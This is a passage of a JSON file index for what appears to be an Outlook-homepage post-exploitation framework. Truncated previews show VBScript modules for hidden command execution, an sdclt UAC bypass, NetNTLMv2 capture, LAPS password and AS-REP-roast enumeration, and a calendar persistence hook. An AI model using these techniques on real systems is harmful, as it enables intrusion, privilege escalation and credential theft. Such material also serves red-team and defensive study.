"path": "api/SpeculaApi/targetver.h",
"chars": 314,
"preview": "#pragma once\r\n\r\n// Including SDKDDKVer.h defines the highest available Windows platform.\r\n\r\n// If you wish to build your"
},
{
"path": "api/SpeculaApi.sln",
"chars": 2071,
"preview": "\r\nMicrosoft Visual Studio Solution File, Format Version 12.00\r\n# Visual Studio Version 17\r\nVisualStudioVersion = 17.7.3"
},
{
"path": "api/SpeculaApiPS/SpeculaApiPS.vcxproj",
"chars": 11147,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/ms"
},
{
"path": "api/SpeculaApiPS/SpeculaApiPS.vcxproj.filters",
"chars": 1547,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbui"
},
{
"path": "functions/api/install_api.py",
"chars": 4028,
"preview": "import copy\nimport os\n\nfrom lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring,makeb"
},
{
"path": "functions/api/install_api.txt",
"chars": 4182,
"preview": "\r\nFunction install_api()\r\n\tOn Error Resume Next\r\n\tis64 = false\r\n\tSet objLocator = window.external.OutlookApplication.Cre"
},
{
"path": "functions/api/load_dll.py",
"chars": 840,
"preview": "from lib.core.specmodule import SpecModule\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n "
},
{
"path": "functions/api/load_dll.txt",
"chars": 257,
"preview": "Function load_dll\n on error resume next\n Set SpeculaApi = window.external.OutlookApplication.CreateObject(\"SpeculaAp"
},
{
"path": "functions/api/remove_api.py",
"chars": 1684,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring,makebool\n\nclass Spec(SpecMod"
},
{
"path": "functions/api/remove_api.txt",
"chars": 1206,
"preview": "\r\nFunction remove_api()\r\n\tOn error resume next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"WbemS"
},
{
"path": "functions/api/run_shell.py",
"chars": 867,
"preview": "from lib.core.specmodule import SpecModule\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n "
},
{
"path": "functions/api/run_shell.txt",
"chars": 201,
"preview": "Function run_shell_api()\n on error resume next\n Set SpeculaApi = window.external.OutlookApplication.CreateObject(\"Sp"
},
{
"path": "functions/api/verify_api.py",
"chars": 913,
"preview": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n "
},
{
"path": "functions/api/verify_api.txt",
"chars": 250,
"preview": "Function api_verify()\n On error resume next\n Set specApi = window.external.OutlookApplication.CreateObject(\"Specul"
},
{
"path": "functions/enumerate/host/list_amsiproviders.py",
"chars": 899,
"preview": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n "
},
{
"path": "functions/enumerate/host/list_amsiproviders.txt",
"chars": 952,
"preview": "Function list_amsiproviders()\r\n\tOn error resume next\r\n\tconst REG_SZ = 1\r\n\tconst REG_EXPAND_SZ = 2\r\n\tconst REG_BINARY = 3"
},
{
"path": "functions/enumerate/host/list_applocker.py",
"chars": 702,
"preview": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n "
},
{
"path": "functions/enumerate/host/list_applocker.txt",
"chars": 1428,
"preview": "Function list_applocker()\r\n\tOn error resume next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"Wbe"
},
{
"path": "functions/enumerate/host/list_autoruns.py",
"chars": 1558,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/enumerate/host/list_autoruns.txt",
"chars": 3734,
"preview": "Function list_autoruns()\r\n\tOn error resume next\r\n\tlist_autoruns = \"HKCU Autoruns:\" & vbCrLf\r\n\tlist_autoruns = list_autor"
},
{
"path": "functions/enumerate/host/list_basic.py",
"chars": 859,
"preview": "from lib.core.specmodule import SpecModule\nfrom datetime import datetime\n\nclass Spec(SpecModule):\n def __init__(self,"
},
{
"path": "functions/enumerate/host/list_basic.txt",
"chars": 834,
"preview": "Function list_basic()\r\n\tOn error resume next\r\n\tSet sh = window.external.OutlookApplication.CreateObject(\"Wsc\" & \"ript.Sh"
},
{
"path": "functions/enumerate/host/list_boottime.py",
"chars": 566,
"preview": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n "
},
{
"path": "functions/enumerate/host/list_boottime.txt",
"chars": 703,
"preview": "Function list_boottime()\r\n On error resume next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"W"
},
{
"path": "functions/enumerate/host/list_clipboard.py",
"chars": 489,
"preview": "from lib.core.specmodule import SpecModule\nfrom datetime import datetime\n\nclass Spec(SpecModule):\n def __init__(self,"
},
{
"path": "functions/enumerate/host/list_clipboard.txt",
"chars": 256,
"preview": "Function list_clipboard()\r\n\tOn error resume next\r\n\tSet html = window.external.OutlookApplication.CreateObject(\"htmlfile\""
},
{
"path": "functions/enumerate/host/list_environmentvariables.py",
"chars": 1034,
"preview": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n "
},
{
"path": "functions/enumerate/host/list_environmentvariables.txt",
"chars": 515,
"preview": "Function list_environmentvariables()\r\n\tOn error resume next\r\n\tlist_environmentvariables = list_environmentvariables & Ge"
},
{
"path": "functions/enumerate/host/list_gpp.py",
"chars": 1009,
"preview": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n "
},
{
"path": "functions/enumerate/host/list_gpp.txt",
"chars": 1429,
"preview": "Function list_gpp()\n On error resume next\n Set sh = window.external.OutlookApplication.CreateObject(\"Wscript.Shell"
},
{
"path": "functions/enumerate/host/list_hostsfile.py",
"chars": 664,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/enumerate/host/list_hostsfile.txt",
"chars": 478,
"preview": "Function list_hostsfile()\r\n\tOn error resume next\r\n\tSet fs = window.external.OutlookApplication.CreateObject(\"Scripting.F"
},
{
"path": "functions/enumerate/host/list_hotfixes.py",
"chars": 601,
"preview": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n "
},
{
"path": "functions/enumerate/host/list_hotfixes.txt",
"chars": 537,
"preview": "Function list_hotfixes()\r\n\tOn Error Resume Next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"Wbem"
},
{
"path": "functions/enumerate/host/list_installedapps.py",
"chars": 801,
"preview": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n "
},
{
"path": "functions/enumerate/host/list_installedapps.txt",
"chars": 1497,
"preview": "Function list_installedapps()\r\n\tOn error resume next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject("
},
{
"path": "functions/enumerate/host/list_installeddotnet.py",
"chars": 1149,
"preview": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n "
},
{
"path": "functions/enumerate/host/list_installeddotnet.txt",
"chars": 4091,
"preview": "Function list_installeddotnet()\r\n\tOn error resume next\r\n\tlist_installeddotnet = \"INSTALLED .NET VERSIONS:\" & vbCrLf\r\n\tx6"
},
{
"path": "functions/enumerate/host/list_installedpowershell.py",
"chars": 594,
"preview": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n "
},
{
"path": "functions/enumerate/host/list_installedpowershell.txt",
"chars": 867,
"preview": "Function list_installedpowershell()\r\n\tOn error resume next\r\n\tSet objLocator = window.external.OutlookApplication.CreateO"
},
{
"path": "functions/enumerate/host/list_iprouting.py",
"chars": 948,
"preview": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n "
},
{
"path": "functions/enumerate/host/list_iprouting.txt",
"chars": 1166,
"preview": "Function list_iprouting()\r\n\tOn error resume next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"Wbe"
},
{
"path": "functions/enumerate/host/list_localadmins.py",
"chars": 950,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/enumerate/host/list_localadmins.txt",
"chars": 1140,
"preview": "Function list_localadmins()\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"WbemScripting.SWbemLocat"
},
{
"path": "functions/enumerate/host/list_localusers.py",
"chars": 619,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/enumerate/host/list_localusers.txt",
"chars": 1219,
"preview": "Function list_localusers()\r\n\ton error resume next\r\n\tSet sh = window.external.OutlookApplication.CreateObject(\"Wscript.Sh"
},
{
"path": "functions/enumerate/host/list_logging.py",
"chars": 720,
"preview": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n "
},
{
"path": "functions/enumerate/host/list_logging.txt",
"chars": 2172,
"preview": "Function list_logging()\r\n\tOn error resume next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"WbemS"
},
{
"path": "functions/enumerate/host/list_mappeddrives.py",
"chars": 515,
"preview": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n "
},
{
"path": "functions/enumerate/host/list_mappeddrives.txt",
"chars": 559,
"preview": "Function list_mappeddrives()\r\n On error resume next\r\n Set objLocator = window.external.OutlookApplication."
},
{
"path": "functions/enumerate/host/list_networkcardinfo.py",
"chars": 535,
"preview": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n "
},
{
"path": "functions/enumerate/host/list_networkcardinfo.txt",
"chars": 885,
"preview": "Function list_networkcardinfo()\r\n\tOn error resume next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObjec"
},
{
"path": "functions/enumerate/host/list_networklogon.py",
"chars": 649,
"preview": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n "
},
{
"path": "functions/enumerate/host/list_networklogon.txt",
"chars": 912,
"preview": "Function list_networklogon()\r\n\tOn error resume next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\""
},
{
"path": "functions/enumerate/host/list_ntdomaininfo.py",
"chars": 579,
"preview": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n "
},
{
"path": "functions/enumerate/host/list_ntdomaininfo.txt",
"chars": 835,
"preview": "Function list_ntdomaininfo()\r\n\tOn error resume next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\""
},
{
"path": "functions/enumerate/host/list_officearch.py",
"chars": 807,
"preview": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n "
},
{
"path": "functions/enumerate/host/list_officearch.txt",
"chars": 465,
"preview": "Function list_officearch()\r\n\tOn Error Resume Next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"Wb"
},
{
"path": "functions/enumerate/host/list_printers.py",
"chars": 465,
"preview": "from lib.core.specmodule import SpecModule\nfrom datetime import datetime\n\nclass Spec(SpecModule):\n def __init__(self,"
},
{
"path": "functions/enumerate/host/list_printers.txt",
"chars": 427,
"preview": "Function list_printers()\r\n\tOn error resume next\r\n\tSet wsh = window.external.OutlookApplication.CreateObject(\"Wscript.Net"
},
{
"path": "functions/enumerate/host/list_processes.py",
"chars": 798,
"preview": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n "
},
{
"path": "functions/enumerate/host/list_processes.txt",
"chars": 1030,
"preview": "Function list_processes()\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"WbemScripting.SWbemLocator"
},
{
"path": "functions/enumerate/host/list_recentcommands.py",
"chars": 1034,
"preview": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n "
},
{
"path": "functions/enumerate/host/list_recentcommands.txt",
"chars": 266,
"preview": "Function list_recentcommands()\r\n\tOn error resume next\r\n\tlist_recentcommands = \"RECENT COMMANDS:\" & vbCrLf\r\n\tlist_recentc"
},
{
"path": "functions/enumerate/host/list_recentfiles.py",
"chars": 607,
"preview": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n "
},
{
"path": "functions/enumerate/host/list_recentfiles.txt",
"chars": 651,
"preview": "Function list_recentfiles()\r\n\tOn error resume next\r\n\tConst MY_RECENT_DOCUMENTS = &H8&\r\n\trecentpaths = \"RECENT PATHS:\" & "
},
{
"path": "functions/enumerate/host/list_recyclebin.py",
"chars": 600,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/enumerate/host/list_recyclebin.txt",
"chars": 1185,
"preview": "Function list_recyclebin()\r\n\tOn error resume next\r\n\tSet sa = window.external.OutlookApplication.CreateObject(\"Shell.Appl"
},
{
"path": "functions/enumerate/host/list_scheduledtasks.py",
"chars": 534,
"preview": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n "
},
{
"path": "functions/enumerate/host/list_scheduledtasks.txt",
"chars": 4995,
"preview": "Function list_scheduledtasks()\r\n\tOn error resume next\r\n\tConst wbemFlagReturnImmediately = &h10\r\n\tConst wbemFlagForwardOn"
},
{
"path": "functions/enumerate/host/list_servicepermissions.py",
"chars": 1136,
"preview": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n "
},
{
"path": "functions/enumerate/host/list_servicepermissions.txt",
"chars": 4018,
"preview": "Function list_servicepermissions()\r\n\t' ACE Types\r\n\r\n\tConst ACCESS_ALLOWED_ACE_TYPE = &h0\r\n\tConst ACCESS_DENIED_ACE_TYPE "
},
{
"path": "functions/enumerate/host/list_services.py",
"chars": 659,
"preview": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n "
},
{
"path": "functions/enumerate/host/list_services.txt",
"chars": 546,
"preview": "Function list_services()\r\n\tOn error resume next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"Wbem"
},
{
"path": "functions/enumerate/host/list_startmenu.py",
"chars": 521,
"preview": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n "
},
{
"path": "functions/enumerate/host/list_startmenu.txt",
"chars": 416,
"preview": "Function list_startmenu()\r\n\tOn error resume next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"Wbe"
},
{
"path": "functions/enumerate/host/list_timezone.py",
"chars": 764,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\nfrom lib.core.specmodule imp"
},
{
"path": "functions/enumerate/host/list_timezone.txt",
"chars": 388,
"preview": "Function list_timezone()\r\n\tOn error resume next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"Wbem"
},
{
"path": "functions/enumerate/host/list_whoami.py",
"chars": 1081,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/enumerate/host/list_whoami.txt",
"chars": 3047,
"preview": "Function list_whoami()\r\n\ton error resume next\r\n\tSet objShell = window.external.OutlookApplication.CreateObject(\"WScript."
},
{
"path": "functions/enumerate/host/list_windowsarch.py",
"chars": 779,
"preview": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n "
},
{
"path": "functions/enumerate/host/list_windowsarch.txt",
"chars": 476,
"preview": "Function list_windowsarch()\r\n\tOn Error Resume Next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"W"
},
{
"path": "functions/enumerate/host/list_windowsversion.py",
"chars": 730,
"preview": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n "
},
{
"path": "functions/enumerate/host/list_windowsversion.txt",
"chars": 515,
"preview": "Function list_windowsversion()\r\n\tOn Error Resume Next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject"
},
{
"path": "functions/enumerate/ldap/ldap_query.py",
"chars": 3352,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring,escapequotes\n\n\nclass Spec(Sp"
},
{
"path": "functions/enumerate/ldap/ldap_query.txt",
"chars": 1126,
"preview": "Function ldap_query()\r\n\tOn error resume next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"WbemScr"
},
{
"path": "functions/enumerate/ldap/list_addcomputertodomain.py",
"chars": 1109,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/enumerate/ldap/list_addcomputertodomain.txt",
"chars": 2265,
"preview": "Function list_addcomputertodomain()\r\n\tOn error resume next\r\n\tSet fs = window.external.OutlookApplication.CreateObject(\"S"
},
{
"path": "functions/enumerate/ldap/list_asreproast.py",
"chars": 768,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/enumerate/ldap/list_asreproast.txt",
"chars": 1206,
"preview": "Function list_asreproast()\r\n\tOn error resume next\r\n\r\n\tConst DONT_REQUIRE_PREAUTH = 4194304\r\n\tSet objLocator = window.ext"
},
{
"path": "functions/enumerate/ldap/list_computer.py",
"chars": 1071,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/enumerate/ldap/list_computer.txt",
"chars": 1459,
"preview": "Function list_computer()\r\n\tOn error resume next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"Wbem"
},
{
"path": "functions/enumerate/ldap/list_computers.py",
"chars": 567,
"preview": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n "
},
{
"path": "functions/enumerate/ldap/list_computers.txt",
"chars": 1202,
"preview": "Function list_computers()\r\n\tOn error resume next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"Wbe"
},
{
"path": "functions/enumerate/ldap/list_domaininfo.py",
"chars": 587,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/enumerate/ldap/list_domaininfo.txt",
"chars": 1169,
"preview": "Function list_domaininfo()\r\n\tOn error resume next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"Wb"
},
{
"path": "functions/enumerate/ldap/list_lapspassword.py",
"chars": 658,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/enumerate/ldap/list_lapspassword.txt",
"chars": 1322,
"preview": "Function list_lapspassword()\r\n\tOn error resume next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\""
},
{
"path": "functions/enumerate/ldap/list_passwordnotrequired.py",
"chars": 755,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/enumerate/ldap/list_passwordnotrequired.txt",
"chars": 1195,
"preview": "Function list_passwordnotrequired()\r\n\tOn error resume next\r\n\r\n\tConst PASSWD_NOTREQD = 32\r\n\tSet objLocator = window.exter"
},
{
"path": "functions/enumerate/ldap/list_passwordpolicy.py",
"chars": 713,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/enumerate/ldap/list_passwordpolicy.txt",
"chars": 1472,
"preview": "Function list_passwordpolicy()\r\n\tOn error resume next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject"
},
{
"path": "functions/enumerate/ldap/list_user.py",
"chars": 959,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/enumerate/ldap/list_user.txt",
"chars": 1443,
"preview": "Function list_user()\r\n\tOn error resume next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"WbemScri"
},
{
"path": "functions/enumerate/ldap/list_users.py",
"chars": 595,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/enumerate/ldap/list_users.txt",
"chars": 1186,
"preview": "Function list_users()\r\n\tOn error resume next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"WbemScr"
},
{
"path": "functions/execute/host/application.py",
"chars": 1424,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/execute/host/application.txt",
"chars": 286,
"preview": "Function Execute_Application()\r\n On Error Resume Next\r\n\tSet app = window.external.OutlookApplication.CreateObject({{c"
},
{
"path": "functions/execute/host/capture_netntlmv2.py",
"chars": 1759,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/execute/host/capture_netntlmv2.txt",
"chars": 327,
"preview": "Function capture_netntlmv2()\r\n On Error Resume Next\r\n Set oHTTP = window.external.OutlookApplication.CreateObject("
},
{
"path": "functions/execute/host/cmd.py",
"chars": 854,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/execute/host/cmd.txt",
"chars": 739,
"preview": "Function Execute_CMD()\n\tOn Error Resume Next\n\n\tConst HIDDEN_WINDOW = 0\n\tSet ws = window.external.OutlookApplication.Crea"
},
{
"path": "functions/execute/host/execute_excel4macro.py",
"chars": 1622,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/execute/host/execute_excel4macro.txt",
"chars": 305,
"preview": "Function execute_excel4macro()\r\n On Error Resume Next\r\n Set excel = window.external.OutlookApplication.CreateObjec"
},
{
"path": "functions/execute/host/execute_registerxll.py",
"chars": 1023,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/execute/host/execute_registerxll.txt",
"chars": 289,
"preview": "Function execute_registerxll()\r\n On Error Resume Next\r\n Set excel = window.external.OutlookApplication.CreateObjec"
},
{
"path": "functions/execute/host/migrate_homepage.py",
"chars": 1162,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/execute/host/migrate_homepage.txt",
"chars": 379,
"preview": "Function Execute_MigrateHomepage()\r\n\tOn Error Resume Next\r\n\tversion = left(window.external.OutlookApplication.Version,4)"
},
{
"path": "functions/execute/host/remove_homepage.py",
"chars": 843,
"preview": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n "
},
{
"path": "functions/execute/host/remove_homepage.txt",
"chars": 1351,
"preview": "Function remove_homepage()\r\n\tOn Error Resume Next\r\n\tSet objContext = window.external.OutlookApplication.CreateObject(\"Wb"
},
{
"path": "functions/execute/host/set_calendarhomepagehook.py",
"chars": 1546,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/execute/host/set_calendarhomepagehook.txt",
"chars": 401,
"preview": "Function set_calendarhomepagehook()\r\n\tOn Error Resume Next\r\n\tversion = left(window.external.OutlookApplication.Version,4"
},
{
"path": "functions/execute/host/spawnproc_explorer.py",
"chars": 1107,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/execute/host/spawnproc_explorer.txt",
"chars": 363,
"preview": "Function Spawn_Explorer()\r\n On Error Resume Next\r\n\tset app = window.external.OutlookApplication.CreateObject(\"Shell.A"
},
{
"path": "functions/execute/host/uac-sdclt.py",
"chars": 1330,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/execute/host/uac-sdclt.txt",
"chars": 1325,
"preview": "Function Execute_UAC_sdclt()\n\tOn Error Resume Next\n\tExecute_UAC_sdclt = \"SDCLT UAC BYPASS\" & vbCrLf\n\tExecute_UAC_sdclt ="
},
{
"path": "functions/execute/host/wmi_execute.py",
"chars": 980,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/execute/host/wmi_execute.txt",
"chars": 546,
"preview": "Function Execute_WMICommand()\r\n On Error Resume Next\r\n Set objLocator = window.external.OutlookApplication.CreateO"
},
{
"path": "functions/execute/host/wmi_killprocname.py",
"chars": 1041,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/execute/host/wmi_killprocname.txt",
"chars": 595,
"preview": "Function KillProc_Name()\r\n\tOn error resume next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"Wbem"
},
{
"path": "functions/execute/host/wmi_killprocpid.py",
"chars": 878,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/execute/host/wmi_killprocpid.txt",
"chars": 594,
"preview": "Function KillProc_PID()\r\n\tOn error resume next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"WbemS"
},
{
"path": "functions/execute/host/wscriptshell.py",
"chars": 827,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/execute/host/wscriptshell.txt",
"chars": 376,
"preview": "Function Execute_WscriptShell()\r\n\tOn Error Resume Next\r\n\tConst HIDDEN_WINDOW = 0\r\n\tSet ws = window.external.OutlookAppli"
},
{
"path": "functions/operation/file/cat_file.py",
"chars": 1453,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring,makebool\nfrom lib.validators"
},
{
"path": "functions/operation/file/cat_file.txt",
"chars": 386,
"preview": "Function cat_file()\r\n\tOn error resume next\r\n\tSet fs = window.external.OutlookApplication.CreateObject(\"Scripting.FileSys"
},
{
"path": "functions/operation/file/check_filearch.py",
"chars": 778,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/operation/file/check_filearch.txt",
"chars": 1416,
"preview": "Function check_filearch()\n On Error Resume Next \n Set BinaryStream = window.external.OutlookApplication.CreateO"
},
{
"path": "functions/operation/file/check_fileexist.py",
"chars": 726,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/operation/file/check_fileexist.txt",
"chars": 324,
"preview": "Function check_fileexist()\r\n\tOn error resume next\r\n Set fs = window.external.OutlookApplication.CreateObject(\"Scripti"
},
{
"path": "functions/operation/file/check_filehash.py",
"chars": 966,
"preview": "from lib.core.specmodule import SpecModule\r\nfrom lib.modhandlers.generic import quotedstring\r\n\r\nclass Spec(SpecModule):\r"
},
{
"path": "functions/operation/file/check_filehash.txt",
"chars": 732,
"preview": "Function check_filehash()\r\n On Error Resume Next \r\n set oMD5 = window.external.OutlookApplication.CreateObject("
},
{
"path": "functions/operation/file/copy_dir.py",
"chars": 1023,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/operation/file/copy_dir.txt",
"chars": 616,
"preview": "Function copy_dir()\n On error resume next\n Set fs = window.external.OutlookApplication.CreateObject(\"Scripting.Fil"
},
{
"path": "functions/operation/file/copy_file.py",
"chars": 924,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/operation/file/copy_file.txt",
"chars": 571,
"preview": "Function copy_file()\n On error resume next\n Set fs = window.external.OutlookApplication.CreateObject(\"Scripting.Fi"
},
{
"path": "functions/operation/file/create_dir.py",
"chars": 855,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/operation/file/create_dir.txt",
"chars": 106,
"preview": "Function create_dir()\r\n On error resume next\r\n create_dir = dir_creator({{directory}})\r\nEnd Function"
},
{
"path": "functions/operation/file/create_shortcut.py",
"chars": 3178,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring,makeint,escapequotes\nfrom li"
},
{
